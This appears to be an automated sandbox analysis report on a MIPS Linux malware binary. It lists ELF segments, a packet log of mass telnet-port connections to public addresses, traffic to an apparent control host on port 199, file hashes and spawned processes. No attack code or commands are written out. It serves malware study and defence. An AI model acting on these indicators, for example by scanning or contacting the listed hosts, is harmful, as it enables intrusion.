                    LOAD0x1fe940x45fe940x45fe940xea00x31284.42520x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                    GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                    TimestampSource PortDest PortSource IPDest IP
                    Dec 15, 2024 00:46:56.375138044 CET3385823192.168.2.1343.191.190.218
                    Dec 15, 2024 00:46:56.379261971 CET4454838242192.168.2.1394.156.227.234
                    Dec 15, 2024 00:46:56.391551971 CET5801823192.168.2.1370.6.24.70
                    Dec 15, 2024 00:46:56.421689987 CET4351423192.168.2.13150.2.161.109
                    Dec 15, 2024 00:46:56.438090086 CET3528823192.168.2.13213.134.46.100
                    Dec 15, 2024 00:46:56.444536924 CET5138423192.168.2.13220.98.46.164
                    Dec 15, 2024 00:46:56.451045036 CET4499823192.168.2.1340.38.255.26
                    Dec 15, 2024 00:46:56.451704979 CET4683823192.168.2.1354.234.185.176
                    Dec 15, 2024 00:46:56.471127033 CET4947423192.168.2.13202.212.151.129
                    Dec 15, 2024 00:46:56.489123106 CET4922023192.168.2.13149.77.79.191
                    Dec 15, 2024 00:46:56.494843960 CET4322423192.168.2.1320.56.43.86
                    Dec 15, 2024 00:46:56.495440006 CET233385843.191.190.218192.168.2.13
                    Dec 15, 2024 00:46:56.495609999 CET3385823192.168.2.1343.191.190.218
                    Dec 15, 2024 00:46:56.498402119 CET4832823192.168.2.13113.193.247.58
                    Dec 15, 2024 00:46:56.499214888 CET382424454894.156.227.234192.168.2.13
                    Dec 15, 2024 00:46:56.499283075 CET4454838242192.168.2.1394.156.227.234
                    Dec 15, 2024 00:46:56.499862909 CET4454838242192.168.2.1394.156.227.234
                    Dec 15, 2024 00:46:56.500261068 CET40304199192.168.2.13154.216.19.139
                    Dec 15, 2024 00:46:56.504523993 CET4360623192.168.2.1366.85.85.13
                    Dec 15, 2024 00:46:56.507728100 CET3844423192.168.2.1389.110.32.213
                    Dec 15, 2024 00:46:56.511642933 CET235801870.6.24.70192.168.2.13
                    Dec 15, 2024 00:46:56.511718035 CET5801823192.168.2.1370.6.24.70
                    Dec 15, 2024 00:46:56.512335062 CET4585823192.168.2.13210.167.147.23
                    Dec 15, 2024 00:46:56.515908957 CET3488023192.168.2.13137.115.32.84
                    Dec 15, 2024 00:46:56.522867918 CET3358023192.168.2.1384.47.121.178
                    Dec 15, 2024 00:46:56.529093981 CET4999623192.168.2.13141.103.169.75
                    Dec 15, 2024 00:46:56.537424088 CET3854623192.168.2.13116.48.251.124
                    Dec 15, 2024 00:46:56.540592909 CET3915823192.168.2.13134.190.47.75
                    Dec 15, 2024 00:46:56.541666985 CET2343514150.2.161.109192.168.2.13
                    Dec 15, 2024 00:46:56.541845083 CET4351423192.168.2.13150.2.161.109
                    Dec 15, 2024 00:46:56.543951988 CET5112023192.168.2.13202.88.155.174
                    Dec 15, 2024 00:46:56.545905113 CET5472423192.168.2.13215.235.57.72
                    Dec 15, 2024 00:46:56.546554089 CET3368023192.168.2.135.195.59.199
                    Dec 15, 2024 00:46:56.548259974 CET4038223192.168.2.13176.79.210.151
                    Dec 15, 2024 00:46:56.551348925 CET5092823192.168.2.13106.98.196.224
                    Dec 15, 2024 00:46:56.553885937 CET6043623192.168.2.1383.113.203.187
                    Dec 15, 2024 00:46:56.556171894 CET5014023192.168.2.13200.202.226.236
                    Dec 15, 2024 00:46:56.558146954 CET5058823192.168.2.13188.159.120.89
                    Dec 15, 2024 00:46:56.558270931 CET2335288213.134.46.100192.168.2.13
                    Dec 15, 2024 00:46:56.558348894 CET3528823192.168.2.13213.134.46.100
                    Dec 15, 2024 00:46:56.559945107 CET4375423192.168.2.1341.220.81.134
                    Dec 15, 2024 00:46:56.561856031 CET4939223192.168.2.13163.143.162.106
                    Dec 15, 2024 00:46:56.563672066 CET5795223192.168.2.13162.212.150.201
                    Dec 15, 2024 00:46:56.564445972 CET2351384220.98.46.164192.168.2.13
                    Dec 15, 2024 00:46:56.564498901 CET5138423192.168.2.13220.98.46.164
                    Dec 15, 2024 00:46:56.565814972 CET5348423192.168.2.13129.115.113.57
                    Dec 15, 2024 00:46:56.567646027 CET5311223192.168.2.13106.155.151.56
                    Dec 15, 2024 00:46:56.569703102 CET3638023192.168.2.13181.190.62.70
                    Dec 15, 2024 00:46:56.571090937 CET234499840.38.255.26192.168.2.13
                    Dec 15, 2024 00:46:56.571263075 CET4499823192.168.2.1340.38.255.26
                    Dec 15, 2024 00:46:56.571713924 CET234683854.234.185.176192.168.2.13
                    Dec 15, 2024 00:46:56.571804047 CET3495623192.168.2.1320.181.7.34
                    Dec 15, 2024 00:46:56.571885109 CET4683823192.168.2.1354.234.185.176
                    Dec 15, 2024 00:46:56.573863983 CET5391023192.168.2.13161.183.124.108
                    Dec 15, 2024 00:46:56.575937986 CET3659223192.168.2.13213.45.210.72
                    Dec 15, 2024 00:46:56.578321934 CET3962823192.168.2.13222.90.52.105
                    Dec 15, 2024 00:46:56.579853058 CET5984623192.168.2.1368.232.115.198
                    Dec 15, 2024 00:46:56.581639051 CET3671423192.168.2.13173.130.0.166
                    Dec 15, 2024 00:46:56.583386898 CET4274623192.168.2.13172.198.43.25
                    Dec 15, 2024 00:46:56.584907055 CET4546423192.168.2.1356.13.103.60
                    Dec 15, 2024 00:46:56.586565971 CET4691823192.168.2.1397.153.125.245
                    Dec 15, 2024 00:46:56.588568926 CET3361823192.168.2.13156.226.204.106
                    Dec 15, 2024 00:46:56.590163946 CET4425423192.168.2.13205.75.66.48
                    Dec 15, 2024 00:46:56.591078043 CET2349474202.212.151.129192.168.2.13
                    Dec 15, 2024 00:46:56.591172934 CET4947423192.168.2.13202.212.151.129
                    Dec 15, 2024 00:46:56.591696024 CET5203623192.168.2.13175.149.49.16
                    Dec 15, 2024 00:46:56.593357086 CET4470823192.168.2.13216.44.218.0
                    Dec 15, 2024 00:46:56.595005035 CET3321023192.168.2.1330.45.197.124
                    Dec 15, 2024 00:46:56.596735954 CET5307023192.168.2.13209.17.124.67
                    Dec 15, 2024 00:46:56.598412991 CET5676423192.168.2.13186.116.34.231
                    Dec 15, 2024 00:46:56.600191116 CET3492223192.168.2.1381.51.94.250
                    Dec 15, 2024 00:46:56.601907969 CET3977823192.168.2.1338.70.142.249
                    Dec 15, 2024 00:46:56.604029894 CET5132823192.168.2.1330.76.75.20
                    Dec 15, 2024 00:46:56.606267929 CET5132823192.168.2.13204.91.212.126
                    Dec 15, 2024 00:46:56.607978106 CET4849023192.168.2.1344.61.144.186
                    Dec 15, 2024 00:46:56.609139919 CET2349220149.77.79.191192.168.2.13
                    Dec 15, 2024 00:46:56.609319925 CET4922023192.168.2.13149.77.79.191
                    Dec 15, 2024 00:46:56.610299110 CET4452023192.168.2.13157.94.199.131
                    Dec 15, 2024 00:46:56.612406969 CET3349423192.168.2.13104.124.234.139
                    Dec 15, 2024 00:46:56.614346981 CET3461823192.168.2.1333.208.21.78
                    Dec 15, 2024 00:46:56.615247965 CET234322420.56.43.86192.168.2.13
                    Dec 15, 2024 00:46:56.615349054 CET4322423192.168.2.1320.56.43.86
                    Dec 15, 2024 00:46:56.616539001 CET4524023192.168.2.13118.71.195.78
                    Dec 15, 2024 00:46:56.618797064 CET5030623192.168.2.13175.235.81.175
                    Dec 15, 2024 00:46:56.620091915 CET2348328113.193.247.58192.168.2.13
                    Dec 15, 2024 00:46:56.620148897 CET4832823192.168.2.13113.193.247.58
                    Dec 15, 2024 00:46:56.620949984 CET4944423192.168.2.13180.151.134.206
                    Dec 15, 2024 00:46:56.622961044 CET3763623192.168.2.1316.178.183.88
                    Dec 15, 2024 00:46:56.625658035 CET3687823192.168.2.1388.109.165.39
                    Dec 15, 2024 00:46:56.627854109 CET5943223192.168.2.13131.104.75.101
                    Dec 15, 2024 00:46:56.632386923 CET382424454894.156.227.234192.168.2.13
                    Dec 15, 2024 00:46:56.632433891 CET19940304154.216.19.139192.168.2.13
                    Dec 15, 2024 00:46:56.632463932 CET234360666.85.85.13192.168.2.13
                    Dec 15, 2024 00:46:56.632488012 CET40304199192.168.2.13154.216.19.139
                    Dec 15, 2024 00:46:56.632509947 CET4360623192.168.2.1366.85.85.13
                    Dec 15, 2024 00:46:56.632527113 CET233844489.110.32.213192.168.2.13
                    Dec 15, 2024 00:46:56.632577896 CET3844423192.168.2.1389.110.32.213
                    Dec 15, 2024 00:46:56.635329962 CET40304199192.168.2.13154.216.19.139
                    Dec 15, 2024 00:46:56.636946917 CET40304199192.168.2.13154.216.19.139
                    Dec 15, 2024 00:46:56.643593073 CET40410199192.168.2.13154.216.19.139

                    System Behavior

                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/tmp/mips.nn.elf
                    Arguments:/tmp/mips.nn.elf
                    File size:5777432 bytes
                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/tmp/mips.nn.elf
                    Arguments:-
                    File size:5777432 bytes
                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/tmp/mips.nn.elf
                    Arguments:-
                    File size:5777432 bytes
                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/tmp/mips.nn.elf
                    Arguments:-
                    File size:5777432 bytes
                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/tmp/mips.nn.elf
                    Arguments:-
                    File size:5777432 bytes
                    MD5 hash:0083f1f0e77be34ad27f849842bbb00c
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/usr/lib/udisks2/udisksd
                    Arguments:-
                    File size:483056 bytes
                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/usr/sbin/dumpe2fs
                    Arguments:dumpe2fs -h /dev/dm-0
                    File size:31112 bytes
                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4
                    Start time (UTC):23:46:55
                    Start date (UTC):14/12/2024
                    Path:/usr/lib/udisks2/udisksd
                    Arguments:-
                    File size:483056 bytes
                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/sbin/dumpe2fs
                    Arguments:dumpe2fs -h /dev/dm-0
                    File size:31112 bytes
                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/lib/udisks2/udisksd
                    Arguments:-
                    File size:483056 bytes
                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/sbin/dumpe2fs
                    Arguments:dumpe2fs -h /dev/dm-0
                    File size:31112 bytes
                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/lib/udisks2/udisksd
                    Arguments:-
                    File size:483056 bytes
                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/sbin/dumpe2fs
                    Arguments:dumpe2fs -h /dev/dm-0
                    File size:31112 bytes
                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/libexec/gnome-session-binary
                    Arguments:-
                    File size:334664 bytes
                    MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/bin/sh
                    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                    File size:129816 bytes
                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/libexec/gsd-housekeeping
                    Arguments:/usr/libexec/gsd-housekeeping
                    File size:51840 bytes
                    MD5 hash:b55f3394a84976ddb92a2915e5d76914
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/lib/udisks2/udisksd
                    Arguments:-
                    File size:483056 bytes
                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                    Start time (UTC):23:46:56
                    Start date (UTC):14/12/2024
                    Path:/usr/sbin/dumpe2fs
                    Arguments:dumpe2fs -h /dev/dm-0
                    File size:31112 bytes
                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4